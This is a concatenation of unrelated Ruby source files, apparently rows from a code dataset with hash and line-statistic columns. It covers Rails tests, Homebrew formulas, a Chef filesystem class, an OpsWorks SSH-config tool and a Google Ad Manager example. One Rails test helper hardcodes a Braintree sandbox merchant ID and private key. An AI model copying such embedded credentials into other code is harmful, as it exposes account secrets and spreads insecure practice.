element :campo_login, 'input[name*="userName"]'
element :campo_senha, 'input[name*="password"]'
element :botao_entrar, 'input[name*="login"]'
def logar(usuario, senha)
campo_login.set usuario
campo_senha.set senha
botao_entrar.click
end
end | 29.333333 | 51 | 0.670455 |
4ad2c6eca2169ec0adb1f7a951ad0dbca877764a | 55 | json.partial! "api/v2/imports/import", import: @import
| 27.5 | 54 | 0.745455 |
21abc012f8ed9bff5e9eb7d39b9be6a0431657a6 | 1,989 | require "chef/chef_fs/file_system/base_fs_object"
require "chef/chef_fs/file_system/nonexistent_fs_object"
class Chef
module ChefFS
module FileSystem
class MultiplexedDir < BaseFSDir
def initialize(*multiplexed_dirs)
@multiplexed_dirs = multiplexed_dirs.flatten
super(@multiplexed_dirs[0].name, @multiplexed_dirs[0].parent)
end
attr_reader :multiplexed_dirs
def write_dir
multiplexed_dirs[0]
end
def children
begin
result = []
seen = {}
# If multiple things have the same name, the first one wins.
multiplexed_dirs.each do |dir|
dir.children.each do |child|
if seen[child.name]
Chef::Log.warn("Child with name '#{child.name}' found in multiple directories: #{seen[child.name].path_for_printing} and #{child.path_for_printing}") unless seen[child.name].path_for_printing == child.path_for_printing
else
result << child
seen[child.name] = child
end
end
end
result
end
end
def make_child_entry(name)
result = nil
multiplexed_dirs.each do |dir|
child_entry = dir.child(name)
if child_entry.exists?
if result
Chef::Log.debug("Child with name '#{child_entry.name}' found in multiple directories: #{result.parent.path_for_printing} and #{child_entry.parent.path_for_printing}")
else
result = child_entry
end
end
end
result
end
def can_have_child?(name, is_dir)
write_dir.can_have_child?(name, is_dir)
end
def create_child(name, file_contents = nil)
@children = nil
write_dir.create_child(name, file_contents)
end
end
end
end
end
| 30.6 | 236 | 0.571644 |
1a2360a5d3fffcfd328fff7edcd2f357d7866463 | 2,382 | # Configure Rails Environment
ENV["RAILS_ENV"] = "test"
# Disable warnings locally
$VERBOSE = ENV["CI"]
require File.expand_path("dummy/config/environment.rb", __dir__)
ActiveRecord::Migrator.migrations_paths = [File.expand_path("dummy/db/migrate", __dir__), File.expand_path("../db/migrate", __dir__)]
require "rails/test_help"
require "minitest/rails"
require "byebug"
# Processors for testing
require "braintree"
require "stripe"
require "stripe_event"
require "paddle_pay"
# Filter out Minitest backtrace while allowing backtrace from other libraries
# to be shown.
Minitest.backtrace_filter = Minitest::BacktraceFilter.new
# Load fixtures from the engine
if ActiveSupport::TestCase.respond_to?(:fixture_path=)
ActiveSupport::TestCase.fixture_path = File.expand_path("../fixtures", __FILE__)
ActionDispatch::IntegrationTest.fixture_path = ActiveSupport::TestCase.fixture_path
ActiveSupport::TestCase.file_fixture_path = ActiveSupport::TestCase.fixture_path + "/files"
ActiveSupport::TestCase.fixtures :all
end
class ActiveSupport::TestCase
include ActiveJob::TestHelper
end
require "minitest/mock"
require "mocha/minitest"
# Uncomment to view the stacktrace for debugging tests
Rails.backtrace_cleaner.remove_silencers!
unless ENV["SKIP_VCR"]
require "webmock/minitest"
require "vcr"
VCR.configure do |c|
c.cassette_library_dir = "test/vcr_cassettes"
c.hook_into :webmock
c.allow_http_connections_when_no_cassette = true
c.filter_sensitive_data("<VENDOR_ID>") { ENV["PADDLE_VENDOR_ID"] }
c.filter_sensitive_data("<VENDOR_AUTH_CODE>") { ENV["PADDLE_VENDOR_AUTH_CODE"] }
end
class ActiveSupport::TestCase
setup do
VCR.insert_cassette name
end
teardown do
VCR.eject_cassette name
end
end
end
Pay.braintree_gateway = Braintree::Gateway.new(
environment: :sandbox,
merchant_id: "zyfwpztymjqdcc5g",
public_key: "5r59rrxhn89npc9n",
private_key: "00f0df79303e1270881e5feda7788927"
)
paddle_public_key = OpenSSL::PKey::RSA.new(File.read("test/support/fixtures/paddle/verification/paddle_public_key.pem"))
ENV["PADDLE_PUBLIC_KEY_BASE64"] = Base64.encode64(paddle_public_key.to_der)
logger = Logger.new("/dev/null")
logger.level = Logger::INFO
Pay.braintree_gateway.config.logger = logger
module Braintree
class Configuration
def self.gateway
Pay.braintree_gateway
end
end
end
| 28.023529 | 133 | 0.7733 |
1c5e83581833d03176db1931b108d154ceeae74d | 3,131 | require 'test_helper'
class UserTest < ActiveSupport::TestCase
def setup
@user = User.new(
name: "Example User",
email: "[email protected]",
password: "foobar",
password_confirmation: "foobar")
end
test "should be valid" do
assert @user.valid?
end
test "name should be present" do
@user.name = " "
assert_not @user.valid?
end
test "email should be present" do
@user.email = " "
assert_not @user.valid?
end
test "name should not be too long" do
@user.name = "a" * 51
assert_not @user.valid?
end
test "email should not be too long" do
@user.email = "a" * 244 + "@example.com"
assert_not @user.valid?
end
test "email validation should accept valid addresses" do
valid_addresses = %w[[email protected] [email protected] [email protected]
[email protected] [email protected]]
valid_addresses.each do |valid_address|
@user.email = valid_address
assert @user.valid?, "#{valid_address.inspect} should be valid"
end
end
test "email validation should reject invalid addresses" do
invalid_addresses = %w[user@example,com user_at_foo.org user.name@example.
foo@bar_baz.com foo@bar+baz.com]
invalid_addresses.each do |invalid_address|
@user.email = invalid_address
assert_not @user.valid?, "#{invalid_address.inspect} should be invalid"
end
end
test "email addresses should be unique" do
duplicate_user = @user.dup
duplicate_user.email = @user.email.upcase
@user.save
assert_not duplicate_user.valid?
end
test "password should be present (nonblank)" do
@user.password = @user.password_confirmation = " " * 6
assert_not @user.valid?
end
test "password should have a minimum length" do
@user.password = @user.password_confirmation = "a" * 5
assert_not @user.valid?
end
test "authenticated? should return false for a user with nil digest" do
assert_not @user.authenticated?(:remember, '')
end
test "associated microposts should be destroyed" do
@user.save
@user.microposts.create!(content: "Lorem ipsum")
assert_difference 'Micropost.count', -1 do
@user.destroy
end
end
test "should follow and unfollow a user" do
michael = users(:michael)
archer = users(:archer)
assert_not michael.following?(archer)
michael.follow(archer)
assert michael.following?(archer)
assert archer.followers.include?(michael)
michael.unfollow(archer)
assert_not michael.following?(archer)
end
test "feed should have the right posts" do
michael = users(:michael)
archer = users(:archer)
lana = users(:lana)
# フォローしているユーザーの投稿を確認
lana.microposts.each do |post_following|
assert michael.feed.include?(post_following)
end
# 自分自身の投稿を確認
michael.microposts.each do |post_self|
assert michael.feed.include?(post_self)
end
# フォローしていないユーザーの投稿を確認
archer.microposts.each do |post_unfollowed|
assert_not michael.feed.include?(post_unfollowed)
end
end
end
| 27.707965 | 78 | 0.667838 |
b9170140b4405fc5842ce300ee93e42aca3a8b85 | 1,419 | class Hugo < Formula
desc "Configurable static site generator"
homepage "https://gohugo.io/"
url "https://github.com/gohugoio/hugo/archive/v0.60.0.tar.gz"
sha256 "cc6b72d2bb56f57bf4a51afcaddfec37bd895b163b47a595dc64e3063c733a4a"
head "https://github.com/gohugoio/hugo.git"
bottle do
cellar :any_skip_relocation
sha256 "891bfede22375b71d2f2bf97608154773657fee30ced2b8a5037a39083edbc04" => :catalina
sha256 "42c2d442620f09272f0342d46020cdd1f3be4277095440e7e9690845bd3e9926" => :mojave
sha256 "f3b0d12c08e768ba981c14d25805f7bfd0ff1018f8d80c4158a52912210abcc3" => :high_sierra
end
depends_on "go" => :build
def install
ENV["GOPATH"] = HOMEBREW_CACHE/"go_cache"
(buildpath/"src/github.com/gohugoio/hugo").install buildpath.children
cd "src/github.com/gohugoio/hugo" do
system "go", "build", "-o", bin/"hugo", "-tags", "extended", "main.go"
# Build bash completion
system bin/"hugo", "gen", "autocomplete", "--completionfile=hugo.sh"
bash_completion.install "hugo.sh"
# Build man pages; target dir man/ is hardcoded :(
(Pathname.pwd/"man").mkpath
system bin/"hugo", "gen", "man"
man1.install Dir["man/*.1"]
prefix.install_metafiles
end
end
test do
site = testpath/"hops-yeast-malt-water"
system "#{bin}/hugo", "new", "site", site
assert_predicate testpath/"#{site}/config.toml", :exist?
end
end
| 33 | 93 | 0.704722 |
1c2660b5c7faf42995b62682d792c40524bc6323 | 3,220 | #!/usr/bin/env ruby
# Encoding: utf-8
#
# Copyright:: Copyright 2012, Google Inc. All Rights Reserved.
#
# License:: Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This example removes the user from all its teams. To determine which users
# exist, run get_all_users.rb.
require 'ad_manager_api'
def delete_user_team_associations(ad_manager, user_id)
# Get the UserTeamAssociationService.
uta_service = ad_manager.service(:UserTeamAssociationService, API_VERSION)
# Create filter text to remove association by user ID.
statement = ad_manager.new_statement_builder do |sb|
sb.where = 'userId = :user_id'
sb.with_bind_variable('user_id', user_id)
end
begin
# Get user team associations by statement.
page = uta_service.get_user_team_associations_by_statement(
statement.to_statement()
)
unless page[:results].nil?
page[:results].each do |association|
puts ('User team association of user ID %d with team ID %d will be ' +
'deleted.') % [association[:user_id], association[:team_id]]
end
end
# Increase the statement offset by the page size to get the next page.
statement.offset += statement.limit
end while statement.offset < page[:total_result_set_size]
# Configure the statement to perform the delete action.
statement.configure do |sb|
sb.offset = nil
sb.limit = nil
end
# Perform the action.
result = uta_service.perform_user_team_association_action(
{:xsi_type => 'DeleteUserTeamAssociations'},
statement.to_statement()
)
# Display results.
if !result.nil? && result[:num_changes] > 0
puts 'Number of user team associations deleted: %d' % result[:num_changes]
else
puts 'No user team associations were deleted.'
end
end
if __FILE__ == $0
API_VERSION = :v201902
# Get AdManagerApi instance and load configuration from ~/ad_manager_api.yml.
ad_manager = AdManagerApi::Api.new
# To enable logging of SOAP requests, set the log_level value to 'DEBUG' in
# the configuration file or provide your own logger:
# ad_manager.logger = Logger.new('ad_manager_xml.log')
begin
user_id = 'INSERT_USER_ID_HERE'.to_i
delete_user_team_associations(ad_manager, user_id)
# HTTP errors.
rescue AdsCommon::Errors::HttpError => e
puts "HTTP Error: %s" % e
# API errors.
rescue AdManagerApi::Errors::ApiException => e
puts "Message: %s" % e.message
puts 'Errors:'
e.errors.each_with_index do |error, index|
puts "\tError [%d]:" % (index + 1)
error.each do |field, value|
puts "\t\t%s: %s" % [field, value]
end
end
end
end
| 31.881188 | 79 | 0.690373 |
ab8b6342ca98d00181aedf3dfda8d640435d6270 | 121 | class AddCookieSaltToUsers < ActiveRecord::Migration
def change
add_column :users, :cookie_salt, :string
end
end
| 20.166667 | 52 | 0.768595 |
ac2d36d9e8d2f7a51de574987d81770d7951b5e8 | 437 | require 'redis'
module Humperdink
class ForkSavvyRedis
def initialize(redis)
@redis = redis
@pid = Process.pid
end
def method_missing(meth_id, *args, &block)
reconnect_on_fork
@redis.send(meth_id, *args, &block)
end
def reconnect_on_fork
if Process.pid != @pid
@redis.client.reconnect
@pid = Process.pid
end
yield @redis if block_given?
end
end
end | 19 | 46 | 0.622426 |
39a865a2691f940e4f5ea6bca01167760b426a44 | 391 | module Twostroke::AST
class Try < Base
attr_accessor :try_statements, :catch_variable, :catch_statements, :finally_statements
def walk(&bk)
if yield self
try_statements.each { |s| s.walk &bk }
catch_statements.each { |s| s.walk &bk } if catch_statements
finally_statements.each { |s| s.walk &bk } if finally_statements
end
end
end
end | 30.076923 | 90 | 0.662404 |
ff8394b947592cca90444f8d6957ebcef73107b8 | 2,447 | # frozen_string_literal: true
require 'spec_helper'
describe ClustersHelper do
describe '#has_rbac_enabled?' do
context 'when kubernetes platform has been created' do
let(:platform_kubernetes) { build_stubbed(:cluster_platform_kubernetes) }
let(:cluster) { build_stubbed(:cluster, :provided_by_gcp, platform_kubernetes: platform_kubernetes) }
it 'returns kubernetes platform value' do
expect(helper.has_rbac_enabled?(cluster)).to be_truthy
end
end
context 'when kubernetes platform has not been created yet' do
let(:cluster) { build_stubbed(:cluster, :providing_by_gcp) }
it 'delegates to cluster provider' do
expect(helper.has_rbac_enabled?(cluster)).to be_truthy
end
context 'when ABAC cluster is created' do
let(:provider) { build_stubbed(:cluster_provider_gcp, :abac_enabled) }
let(:cluster) { build_stubbed(:cluster, :providing_by_gcp, provider_gcp: provider) }
it 'delegates to cluster provider' do
expect(helper.has_rbac_enabled?(cluster)).to be_falsy
end
end
end
end
describe '#create_new_cluster_label' do
subject { helper.create_new_cluster_label(provider: provider) }
context 'GCP provider' do
let(:provider) { 'gcp' }
it { is_expected.to eq('Create new cluster on GKE') }
end
context 'AWS provider' do
let(:provider) { 'aws' }
it { is_expected.to eq('Create new cluster on EKS') }
end
context 'other provider' do
let(:provider) { 'other' }
it { is_expected.to eq('Create new cluster') }
end
context 'no provider' do
let(:provider) { nil }
it { is_expected.to eq('Create new cluster') }
end
end
describe '#render_new_provider_form' do
subject { helper.new_cluster_partial(provider: provider) }
context 'GCP provider' do
let(:provider) { 'gcp' }
it { is_expected.to eq('clusters/clusters/gcp/new') }
end
context 'AWS provider' do
let(:provider) { 'aws' }
it { is_expected.to eq('clusters/clusters/aws/new') }
end
context 'other provider' do
let(:provider) { 'other' }
it { is_expected.to eq('clusters/clusters/cloud_providers/cloud_provider_selector') }
end
context 'no provider' do
let(:provider) { nil }
it { is_expected.to eq('clusters/clusters/cloud_providers/cloud_provider_selector') }
end
end
end
| 27.188889 | 107 | 0.665713 |
2611af99151001e9175bf683a097499547d7c85e | 3,363 | # frozen_string_literal: true
require 'aws-sdk'
require 'trollop'
require 'opzworks'
SSH_PREFIX = '# --- OpzWorks ---'
SSH_POSTFIX = '# --- End of OpzWorks ---'
module OpzWorks
class Commands
class SSH
def self.banner
'Generate and update SSH configuration files'
end
def self.run
options = Trollop.options do
banner <<-EOS.unindent
#{SSH.banner}
opzworks ssh {stack1} {stack2} {...}
The stack name can be passed as any unique regex. If no
arguments are passed, the command will iterate over all stacks.
Options:
EOS
opt :update, 'Update ~/.ssh/config directly'
opt :backup, 'Backup old SSH config before updating'
opt :quiet, 'Use SSH LogLevel quiet', default: true
opt :private, 'Return private IPs, rather than the default of public', default: false
opt :raw, 'Return only raw IPs rather than .ssh/config format output', default: false
end
config = OpzWorks.config
client = Aws::OpsWorks::Client.new(region: config.aws_region, profile: config.aws_profile)
stacks = []
stack_data = client.describe_stacks
if ARGV.empty?
stack_data[:stacks].each { |stack| stacks.push(stack) }
else
ARGV.each do |arg|
stack_data[:stacks].each do |stack|
stacks.push(stack) if stack[:name] =~ /#{arg}/
end
end
end
stacks.each do |stack|
instances = []
stack_name = ''
stack_name = stack[:name].gsub('::', '-')
result = client.describe_instances(stack_id: stack[:stack_id])
instances += result.instances.select { |i| i[:status] != 'stopped' }
instances.map! do |instance|
ip = if options[:private]
instance[:private_ip]
else
instance[:elastic_ip].nil? ? instance[:public_ip] : instance[:elastic_ip]
end
if options[:raw]
puts ip
else
next if ip.nil?
parameters = {
'Host' => "#{instance[:hostname]}-#{stack_name}",
'HostName' => ip,
'User' => config.ssh_user_name
}
parameters['LogLevel'] = 'quiet' if options[:quiet]
parameters.map { |param| param.join(' ') }.join("\n ")
end
end
next if options[:raw]
new_contents = "#{instances.join("\n")}\n"
if options[:update]
ssh_config = "#{ENV['HOME']}/.ssh/config"
old_contents = File.read(ssh_config)
if options[:backup]
backup_name = ssh_config + '.backup'
File.open(backup_name, 'w') { |file| file.puts old_contents }
end
File.open(ssh_config, 'w') do |file|
file.puts old_contents.gsub(
/\n?\n?#{SSH_PREFIX}.*#{SSH_POSTFIX}\n?\n?/m,
''
)
file.puts new_contents
end
puts "Successfully updated #{ssh_config} with #{instances.length} instances!"
else
puts new_contents.strip
end
end
end
end
end
end
| 30.297297 | 98 | 0.521558 |
03929c24bd93c8092f09bc3974aba2e176d2d37c | 738 | class RubyBotJob < ApplicationJob
queue_as :default
def perform(data,room_id,to_ignore=nil)
search_keywords = %w{scouring rummage foraging forage hunting seeking hunt looking quest exploration frisking frisk activity manhunt shakedown ransacking searching help}
if (data["body"].split(' ').collect(&:downcase) & search_keywords).blank?
data["body"] = Rails::Bot.conversation(data["body"])
data["sent_by"] = "Bot"
data["time"] = Time.now.strftime("at %I:%M%p")
data["type_of_message"] = "bot"
ActionCable.server.broadcast("chat_#{room_id}", data)
else
ActionCable.server.broadcast("chat_#{room_id}", Rails::Bot.search(data["body"].gsub("Looking for","")))
end
end
end
| 36.9 | 172 | 0.680217 |
e29364f3f8433fe8debcc43d36bf2cc493403746 | 2,602 | class Minio < Formula
desc "High Performance, Kubernetes Native Object Storage"
homepage "https://min.io"
url "https://github.com/minio/minio.git",
tag: "RELEASE.2022-03-17T06-34-49Z",
revision: "ffcadcd99e012af6005145fb265ea88a0c3750ed"
version "20220317063449"
license "AGPL-3.0-or-later"
head "https://github.com/minio/minio.git", branch: "master"
livecheck do
url :stable
regex(%r{href=.*?/tag/(?:RELEASE[._-]?)?([\d\-TZ]+)["' >]}i)
strategy :github_latest do |page, regex|
page.scan(regex).map { |match| match&.first&.gsub(/\D/, "") }
end
end
bottle do
sha256 cellar: :any_skip_relocation, arm64_monterey: "2d9896a9051cbcccbce9917bae0f900079ad28034175e19eda3aff2c61ad9ad3"
sha256 cellar: :any_skip_relocation, arm64_big_sur: "0307e8e3c2643d2b3bd7d3f1bbeab0a3b0134a4a5c7667c469f1ef69adfb1159"
sha256 cellar: :any_skip_relocation, monterey: "d6fc58ef3c5986a6cf435a06d5fdd5f26eff13c07aba02fbcdbeff03e72ff109"
sha256 cellar: :any_skip_relocation, big_sur: "030b10fa037cfa8abb4ee0f1d248ddbde1b00141bbc806cf70bb66408f3d5a65"
sha256 cellar: :any_skip_relocation, catalina: "cc10eddf1fd82ff6203e35e173865349b8f85c3f77e547abddf0d561a2667a6d"
sha256 cellar: :any_skip_relocation, x86_64_linux: "cc627e4402627060e5136c2ba7671e262a5b4a21f66ad56331662a09e90a83d2"
end
depends_on "go" => :build
def install
if build.head?
system "go", "build", *std_go_args
else
release = `git tag --points-at HEAD`.chomp
version = release.gsub(/RELEASE\./, "").chomp.gsub(/T(\d+)-(\d+)-(\d+)Z/, 'T\1:\2:\3Z')
ldflags = %W[
-s -w
-X github.com/minio/minio/cmd.Version=#{version}
-X github.com/minio/minio/cmd.ReleaseTag=#{release}
-X github.com/minio/minio/cmd.CommitID=#{Utils.git_head}
]
system "go", "build", *std_go_args(ldflags: ldflags)
end
end
def post_install
(var/"minio").mkpath
(etc/"minio").mkpath
end
service do
run [opt_bin/"minio", "server", "--config-dir=#{etc}/minio", "--address=:9000", var/"minio"]
keep_alive true
working_dir HOMEBREW_PREFIX
log_path var/"log/minio.log"
error_log_path var/"log/minio.log"
end
test do
assert_match "minio server - start object storage server",
shell_output("#{bin}/minio server --help 2>&1")
assert_match "minio gateway - start object storage gateway",
shell_output("#{bin}/minio gateway 2>&1")
assert_match "ERROR Unable to validate credentials",
shell_output("#{bin}/minio gateway s3 2>&1", 1)
end
end
| 36.647887 | 123 | 0.691007 |
abaf0c0cf1db266740e8a1f29f879fc665fd47ef | 2,295 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20160321141336) do
create_table "beliefs", force: :cascade do |t|
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "distortions", force: :cascade do |t|
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "lady_bugs", force: :cascade do |t|
t.text "content"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.integer "user_id"
end
create_table "log_lady_bugs", force: :cascade do |t|
t.integer "log_id"
t.integer "lady_bug_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "log_tags", force: :cascade do |t|
t.integer "log_id"
t.integer "tag_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "logs", force: :cascade do |t|
t.text "content"
t.integer "before_rating"
t.integer "after_rating"
t.integer "distortion_id"
t.integer "user_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.integer "belief_id"
end
create_table "tags", force: :cascade do |t|
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "users", force: :cascade do |t|
t.string "name"
t.string "email"
t.string "password_digest"
end
end
| 31.438356 | 86 | 0.697168 |
5dd0a53fa71aa2513efb4bbfb7ee2a00f59f2ed4 | 1,210 | require 'spec_helper'
describe Puppet::Type.type(:firewalld_service) do
before do
Puppet::Provider::Firewalld.any_instance.stubs(:state).returns(:true) # rubocop:disable RSpec/AnyInstance
end
context 'with no params' do
describe 'when validating attributes' do
[:name, :service, :zone].each do |param|
it "should have a #{param} parameter" do
expect(described_class.attrtype(param)).to eq(:param)
end
end
end
describe 'namevar validation' do
it 'has :name as its namevar' do
expect(described_class.key_attributes).to eq([:name])
end
end
end
context 'autorequires' do
# rubocop:disable RSpec/InstanceVariable
before do
firewalld_service = Puppet::Type.type(:service).new(name: 'firewalld')
@catalog = Puppet::Resource::Catalog.new
@catalog.add_resource(firewalld_service)
end
it 'autorequires the firewalld service' do
resource = described_class.new(name: 'test', service: 'test')
@catalog.add_resource(resource)
expect(resource.autorequire.map { |rp| rp.source.to_s }).to include('Service[firewalld]')
end
# rubocop:enable RSpec/InstanceVariable
end
end
| 29.512195 | 109 | 0.681818 |
7afc35eabe60d3008f0c0d49bc46f2198345eee5 | 155 | module AuthHelper
def auth_headers(user)
token = JsonWebToken.encode({user_id: user.id})
{'Authorization': "Bearer #{token[:token]}"}
end
end | 19.375 | 51 | 0.683871 |
875f17282f9804c6c662556dc1b3873c98ef4135 | 830 | # frozen_string_literal: true
class PagesWorker # rubocop:disable Scalability/IdempotentWorker
include ApplicationWorker
sidekiq_options retry: 3
feature_category :pages
def perform(action, *arg)
send(action, *arg) # rubocop:disable GitlabSecurity/PublicSend
end
# rubocop: disable CodeReuse/ActiveRecord
def deploy(build_id)
build = Ci::Build.find_by(id: build_id)
result = Projects::UpdatePagesService.new(build.project, build).execute
if result[:status] == :success
result = Projects::UpdatePagesConfigurationService.new(build.project).execute
end
result
end
# rubocop: enable CodeReuse/ActiveRecord
def remove(namespace_path, project_path)
full_path = File.join(Settings.pages.path, namespace_path, project_path)
FileUtils.rm_r(full_path, force: true)
end
end
| 27.666667 | 83 | 0.755422 |
e27c68bf1197c098266f3d7ee5a6846d3106e2ea | 4,243 | require 'spec_helper'
describe ProjectRequestPresenter do
let(:project_request_presenter) { FactoryGirl.build(:project_request_presenter) }
describe "#project_request" do
let(:project_request) { project_request_presenter.project_request }
it "should instantiate a project request based on the params" do
project_request.new_record?.should be_true
project_request.requestor_organisation_uri.should == project_request_presenter.requestor_organisation_uri
project_request.project_uri.should == project_request_presenter.project_uri
end
end
describe "#save" do
it "should create a request with the right details" do
project_request_presenter.save
project_request_presenter.project_request.should be_persisted
project_request_presenter.project_request.requestor_organisation_uri.should == project_request_presenter.requestor_organisation_uri
project_request_presenter.project_request.project_uri.should == project_request_presenter.project_uri
end
end
context "when there's an existing pending request" do
let!(:project_request) { project_request_presenter.project_request.save! }
it "should be invalid" do
project_request_presenter.should_not be_valid
end
it "should have an error about not having existing requests" do
project_request_presenter.valid?
project_request_presenter.errors[:project_uri].should include("Your organisation has already requsted membership to this project")
end
end
context "when organisation is already a member of the project" do
before do
pm = ProjectMembership.new
pm.nature = Concepts::ProjectMembershipNature.all.first.uri
pm.project = project_request_presenter.project_uri
pm.organisation = project_request_presenter.requestor_organisation_uri
pm.save!
end
it "should not be valid" do
project_request_presenter.should_not be_valid
end
it "should have an error message about the org already being a member" do
project_request_presenter.valid?
project_request_presenter.errors[:project_uri].should include("This organisation is already a member of this project")
end
end
# let(:project_request_presenter) { FactoryGirl.build(:project_request_presenter) }
# let(:project) { Project.find(project_request_presenter.project.uri.to_s) }
# it "must have a valid factory" do
# project_request_presenter.should be_valid
# end
# it "must have not be for an organisation already a member of the project" do
# FactoryGirl.create(:project_membership, organisation: project_request_presenter.organisation.uri.to_s, project: project_request_presenter.project.uri.to_s)
# project_request_presenter.should_not be_valid
# end
# describe '.save' do
# context "without user details" do
# before do
# project_request_presenter.save
# end
# it "must create a project request with the correct details" do
# project_request_presenter.project_request.should be_persisted
# project_request_presenter.project_request.requestable.should == project_request_presenter.project
# project_request_presenter.project_request.requestor.should == project_request_presenter.organisation
# project_request_presenter.project_request.project_membership_nature_uri.should == project_request_presenter.nature_uri
# end
# end
# context "with user details" do
# before do
# end
# it "must create a user request with the correct details if they are provided" do
# organisation = FactoryGirl.create(:organisation)
# project_request_presenter.user_first_name = "Foo"
# project_request_presenter.user_email = "[email protected]"
# project_request_presenter.user_organisation_uri = organisation.uri.to_s
# project_request_presenter.save
# project_request_presenter.user_request.should be_persisted
# project_request_presenter.user_request.user_first_name.should == "Foo"
# project_request_presenter.user_request.user_email.should == "[email protected]"
# project_request_presenter.user_request.requestable.should == organisation
# end
# end
# end
end | 36.895652 | 161 | 0.757483 |
5dc753443be8c050693ded0d011cd1674b5d134b | 156 | class AddDecimalPlaceToExpenses < ActiveRecord::Migration[4.2]
def change
change_column :expenses, :value, :decimal, precision: 7, scale: 2
end
end
| 26 | 69 | 0.75 |
1d404915617e1bbf9723f078f35b4903f37f0ac6 | 1,914 | # frozen_string_literal: true
require 'spec_helper'
describe Gitlab::ContentSecurityPolicy::ConfigLoader do
let(:policy) { ActionDispatch::ContentSecurityPolicy.new }
let(:csp_config) do
{
enabled: true,
report_only: false,
directives: {
base_uri: 'http://example.com',
child_src: "'self' https://child.example.com",
default_src: "'self' https://other.example.com",
script_src: "'self' https://script.exammple.com ",
worker_src: "data: https://worker.example.com",
report_uri: "http://example.com"
}
}
end
context '.default_settings_hash' do
it 'returns empty defaults' do
settings = described_class.default_settings_hash
expect(settings['enabled']).to be_falsey
expect(settings['report_only']).to be_falsey
described_class::DIRECTIVES.each do |directive|
expect(settings['directives'].has_key?(directive)).to be_truthy
expect(settings['directives'][directive]).to be_nil
end
end
end
context '#load' do
subject { described_class.new(csp_config[:directives]) }
def expected_config(directive)
csp_config[:directives][directive].split(' ').map(&:strip)
end
it 'sets the policy properly' do
subject.load(policy)
expect(policy.directives['base-uri']).to eq([csp_config[:directives][:base_uri]])
expect(policy.directives['default-src']).to eq(expected_config(:default_src))
expect(policy.directives['child-src']).to eq(expected_config(:child_src))
expect(policy.directives['worker-src']).to eq(expected_config(:worker_src))
expect(policy.directives['report-uri']).to eq(expected_config(:report_uri))
end
it 'ignores malformed policy statements' do
csp_config[:directives][:base_uri] = 123
subject.load(policy)
expect(policy.directives['base-uri']).to be_nil
end
end
end
| 30.870968 | 87 | 0.675026 |
edc621da4d34e64dda3a7d45e3d5fd8e2334defd | 3,175 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe Api::V1::RolesController, type: :request do
let!(:super_admin) { create(:user, :super_admin) }
let!(:organization) { create(:organization) }
let!(:with_read_permission) { organization.user }
let!(:cant_modify) do
[
create(:user, :admin),
create(:user, :waiter),
create(:user, :kitchen),
create(:user, :cash_register),
create(:user, :customer)
]
end
let!(:roles) { create_list(:role, 10) }
describe '#GET /api/roles' do
it 'requests all roles' do
get api_v1_roles_path, headers: auth_header(super_admin)
expect(response).to have_http_status(:ok)
end
it 'admin can read all roles' do
get api_v1_roles_path, headers: auth_header(with_read_permission)
expect(response).to have_http_status(:ok)
end
end
describe '#GET /api/roles/:id' do
it 'requests role by id' do
get api_v1_role_path(roles.sample.id), headers: auth_header(super_admin)
expect(response).to have_http_status(:ok)
end
it 'admin can read role by id' do
get api_v1_roles_path, headers: auth_header(with_read_permission)
expect(response).to have_http_status(:ok)
end
end
describe '#POST /api/roles' do
it 'creates a role' do
attributes = attributes_for(:role)
post api_v1_roles_path, params: attributes.to_json, headers: auth_header(super_admin)
expect(response).to have_http_status(:created)
end
it 'throws error with invalid params' do
post api_v1_roles_path, headers: auth_header(super_admin)
expect(response).to have_http_status(:unprocessable_entity)
end
it 'with invalid permission, should return forbidden status' do
attributes = attributes_for(:role)
post api_v1_roles_path, params: attributes.to_json, headers: auth_header(cant_modify.sample)
expect(response).to have_http_status(:forbidden)
end
end
describe '#PUT /api/roles/:id' do
let!(:role) { roles.sample }
it 'updates a role' do
role.name = 'editado'
put api_v1_role_path(role.id), params: role.to_json, headers: auth_header(super_admin)
expect(response).to have_http_status(:ok)
end
it 'throws error with invalid params' do
role.name = ''
put api_v1_role_path(role.id), params: role.to_json, headers: auth_header(super_admin)
expect(response).to have_http_status(:unprocessable_entity)
end
it 'with invalid permission, should return forbidden status' do
role.name = 'editado'
put api_v1_role_path(role.id), params: role.to_json, headers: auth_header(cant_modify.sample)
expect(response).to have_http_status(:forbidden)
end
end
describe '#DELETE /api/roles/:id' do
it 'deletes role' do
delete api_v1_role_path(roles.sample.id), headers: auth_header(super_admin)
expect(response).to have_http_status(:no_content)
end
it 'with invalid permission, should return forbidden status' do
delete api_v1_role_path(roles.sample.id), headers: auth_header(cant_modify.sample)
expect(response).to have_http_status(:forbidden)
end
end
end
| 32.731959 | 99 | 0.700787 |
edb765ee1a6ecb64eb483a8bdd73d1bb933adac6 | 481 | require 'formula'
class Dex2jar < Formula
homepage 'https://code.google.com/p/dex2jar/'
url 'https://dex2jar.googlecode.com/files/dex2jar-0.0.9.15.zip'
sha1 'cc9366836d576ce22a18de8f214368636db9fcba'
def install
# Remove Windows scripts
rm_rf Dir['*.bat']
# Install files
prefix.install_metafiles
libexec.install Dir['*']
Dir.glob("#{libexec}/*.sh") do |script|
bin.install_symlink script => File.basename(script, '.sh')
end
end
end
